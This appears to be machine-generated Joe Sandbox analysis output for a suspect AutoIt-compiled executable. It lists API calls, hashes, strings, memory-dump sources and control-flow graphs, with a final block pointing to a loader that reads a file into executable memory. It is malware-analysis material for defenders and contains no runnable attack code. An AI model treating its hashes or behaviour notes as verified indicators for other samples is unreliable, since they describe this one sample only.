                                                • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                Control-flow Graph

                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • __wcsicoll.LIBCMT ref: 00402007
                                                • __wcsicoll.LIBCMT ref: 0040201D
                                                • __wcsicoll.LIBCMT ref: 00402033
                                                  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                • __wcsicoll.LIBCMT ref: 00402049
                                                • _wcscpy.LIBCMT ref: 0040207C
                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                • API String ID: 3948761352-1609664196
                                                • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                • __wsplitpath.LIBCMT ref: 0040E41C
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • _wcsncat.LIBCMT ref: 0040E433
                                                • __wmakepath.LIBCMT ref: 0040E44F
                                                  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                • _wcscpy.LIBCMT ref: 0040E487
                                                  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                • _wcscat.LIBCMT ref: 00427541
                                                • _wcslen.LIBCMT ref: 00427551
                                                • _wcslen.LIBCMT ref: 00427562
                                                • _wcscat.LIBCMT ref: 0042757C
                                                • _wcsncpy.LIBCMT ref: 004275BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                • String ID: Include$\
                                                • API String ID: 3173733714-3429789819
                                                • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                Control-flow Graph

                                                APIs
                                                • _fseek.LIBCMT ref: 0045292B
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                • __fread_nolock.LIBCMT ref: 00452961
                                                • __fread_nolock.LIBCMT ref: 00452971
                                                • __fread_nolock.LIBCMT ref: 0045298A
                                                • __fread_nolock.LIBCMT ref: 004529A5
                                                • _fseek.LIBCMT ref: 004529BF
                                                • _malloc.LIBCMT ref: 004529CA
                                                • _malloc.LIBCMT ref: 004529D6
                                                • __fread_nolock.LIBCMT ref: 004529E7
                                                • _free.LIBCMT ref: 00452A17
                                                • _free.LIBCMT ref: 00452A20
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                • String ID:
                                                • API String ID: 1255752989-0
                                                • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __fread_nolock$_fseek_wcscpy
                                                • String ID: FILE
                                                • API String ID: 3888824918-3121273764
                                                • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                • ImageList_ReplaceIcon.COMCTL32(00ACED10,000000FF,00000000), ref: 00410552
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                • RegisterClassExW.USER32(?), ref: 0041045D
                                                  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00ACED10,000000FF,00000000), ref: 00410552
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                • String ID: #$0$AutoIt v3
                                                • API String ID: 423443420-4155596026
                                                • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: _malloc
                                                • String ID: Default
                                                • API String ID: 1579825452-753088835
                                                • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1970 40f696-40f69c 1966->1970 1968 40f660-40f674 call 4150d1 1967->1968 1969 40f63e 1967->1969 1974 40f679-40f67c 1968->1974 1971 40f640 1969->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1968 1977->1971 1991 425d43-425d5f call 414d30 1978->1991 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1984 425d16 1982->1984 1985 40f6c8-40f6d6 1982->1985 1983->1975 1984->1978 1987 425d05-425d0b 1985->1987 1988 40f6dc-40f6df 1985->1988 1987->1973 1990 425d11 1987->1990 1988->1975 1990->1984 1991->1970
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_fseek_memmove_strcat
                                                • String ID: AU3!$EA06
                                                • API String ID: 1268643489-2658333250
                                                • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1997 401144-40114a 1995->1997 1998 40111b-40111e 1995->1998 1996->1995 1999 401182 1996->1999 2001 401184-40118e call 401250 1997->2001 2002 40114c-40114f 1997->2002 1998->1997 2000 401120-401126 1998->2000 2003 40112c-401141 DefWindowProcW 1999->2003 2000->2003 2004 42b038-42b03f 2000->2004 2013 401193-40119a 2001->2013 2005 401151-401157 2002->2005 2006 40119d 2002->2006 2004->2003 2012 42b045-42b059 call 401000 call 40e0c0 2004->2012 2010 401219-40121f 2005->2010 2011 40115d 2005->2011 2008 4011a3-4011a9 2006->2008 2009 42afb4-42afc5 call 40f190 2006->2009 2008->2000 2014 4011af 2008->2014 2009->2013 2010->2000 2017 401225-42b06d call 468b0e 2010->2017 2015 401163-401166 2011->2015 2016 42b01d-42b024 2011->2016 2012->2003 2014->2000 2020 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2014->2020 2021 4011db-401202 SetTimer RegisterWindowMessageW 2014->2021 2023 42afe9-42b018 call 40f190 call 401a50 2015->2023 2024 40116c-401172 2015->2024 2016->2003 2022 42b02a-42b033 call 4370f4 2016->2022 2017->2013 2021->2013 2031 401204-401216 CreatePopupMenu 2021->2031 2022->2003 2023->2003 2024->2000 2033 401174-42afde call 45fd57 2024->2033 2033->2003 2045 42afe4 2033->2045 2045->2013
                                                APIs
                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                • CreatePopupMenu.USER32 ref: 00401204
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                • String ID: TaskbarCreated
                                                • API String ID: 129472671-2362178303
                                                • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                APIs
                                                • _malloc.LIBCMT ref: 004115F1
                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                • std::exception::exception.LIBCMT ref: 00411626
                                                • std::exception::exception.LIBCMT ref: 00411640
                                                • __CxxThrowException@8.LIBCMT ref: 00411651
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                • String ID: ,*H$4*H$@fI
                                                • API String ID: 615853336-1459471987
                                                • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2065 3fc1730-3fc17de call 3fbf140 2068 3fc17e5-3fc180b call 3fc2640 CreateFileW 2065->2068 2071 3fc180d 2068->2071 2072 3fc1812-3fc1822 2068->2072 2073 3fc195d-3fc1961 2071->2073 2077 3fc1829-3fc1843 VirtualAlloc 2072->2077 2078 3fc1824 2072->2078 2074 3fc19a3-3fc19a6 2073->2074 2075 3fc1963-3fc1967 2073->2075 2079 3fc19a9-3fc19b0 2074->2079 2080 3fc1969-3fc196c 2075->2080 2081 3fc1973-3fc1977 2075->2081 2082 3fc184a-3fc1861 ReadFile 2077->2082 2083 3fc1845 2077->2083 2078->2073 2084 3fc1a05-3fc1a1a 2079->2084 2085 3fc19b2-3fc19bd 2079->2085 2080->2081 2086 3fc1979-3fc1983 2081->2086 2087 3fc1987-3fc198b 2081->2087 2090 3fc1868-3fc18a8 VirtualAlloc 2082->2090 2091 3fc1863 2082->2091 2083->2073 2094 3fc1a1c-3fc1a27 VirtualFree 2084->2094 2095 3fc1a2a-3fc1a32 2084->2095 2092 3fc19bf 2085->2092 2093 3fc19c1-3fc19cd 2085->2093 2086->2087 2088 3fc198d-3fc1997 2087->2088 2089 3fc199b 2087->2089 2088->2089 2089->2074 2096 3fc18af-3fc18ca call 3fc2890 2090->2096 2097 3fc18aa 2090->2097 2091->2073 2092->2084 2098 3fc19cf-3fc19df 2093->2098 2099 3fc19e1-3fc19ed 2093->2099 2094->2095 2105 3fc18d5-3fc18df 2096->2105 2097->2073 2101 3fc1a03 2098->2101 2102 3fc19ef-3fc19f8 2099->2102 2103 3fc19fa-3fc1a00 2099->2103 2101->2079 2102->2101 2103->2101 2106 3fc18e1-3fc1910 call 3fc2890 2105->2106 2107 3fc1912-3fc1926 call 3fc26a0 2105->2107 2106->2105 2112 3fc1928 2107->2112 2113 3fc192a-3fc192e 2107->2113 2112->2073 2115 3fc193a-3fc193e 2113->2115 2116 3fc1930-3fc1934 CloseHandle 2113->2116 2117 3fc194e-3fc1957 2115->2117 2118 3fc1940-3fc194b VirtualFree 2115->2118 2116->2115 2117->2068 2117->2073 2118->2117
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03FC1801
                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03FC1A27
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1273163633.0000000003FBF000.00000040.00000020.00020000.00000000.sdmp, Offset: 03FBF000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_3fbf000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CreateFileFreeVirtual
                                                • String ID:
                                                • API String ID: 204039940-0
                                                • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                • Instruction ID: 6dbf15755da0954f35bf0227b6663a30ad66d8cb1995308eade8f6221c9a52dd
                                                • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                • Instruction Fuzzy Hash: 94A12774E5024AEBDB14CFA4CA94BEEF7B5FF48304F208599E106BB281C7759A90CB54

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
